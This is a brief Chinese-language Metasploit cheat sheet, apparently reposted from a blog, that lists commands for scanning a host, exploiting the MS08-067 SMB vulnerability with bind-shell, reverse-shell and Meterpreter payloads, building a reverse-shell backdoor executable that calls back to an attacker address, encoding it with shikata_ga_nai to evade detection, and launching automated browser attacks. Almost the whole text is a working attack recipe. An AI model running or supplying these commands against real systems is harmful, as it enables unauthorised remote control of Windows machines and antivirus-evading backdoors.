load db_tracker
db_nmap -T Aggressive -sV -n -O -v 192.168.0.107
绑定shell
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/bind_tcp
反弹shell
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/reverse_tcp
Meterpreter方式
set PAYLOAD windows/meterpreter/reverse_tcp
生成后门
/msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 O
./msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 X > /root/server.exe
加密后门
./msfpayload windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=33333 R | ./msfencode -e x86/shikata_ga_nai -t exe > /root/server1.exe
自动化浏览器攻击
use auxiliary/server/browser_autopwn
转载于:https://www.cnblogs.com/shanmao/p/3335045.html
本文详细介绍使用Metasploit框架进行渗透测试的过程,包括利用MS08-067漏洞获取远程shell,设置不同类型的payload,如bind_tcp、reverse_tcp和Meterpreter,以及生成和加密后门。此外,还介绍了如何利用辅助模块实现自动化浏览器攻击。
1万+

被折叠的 条评论
为什么被折叠?



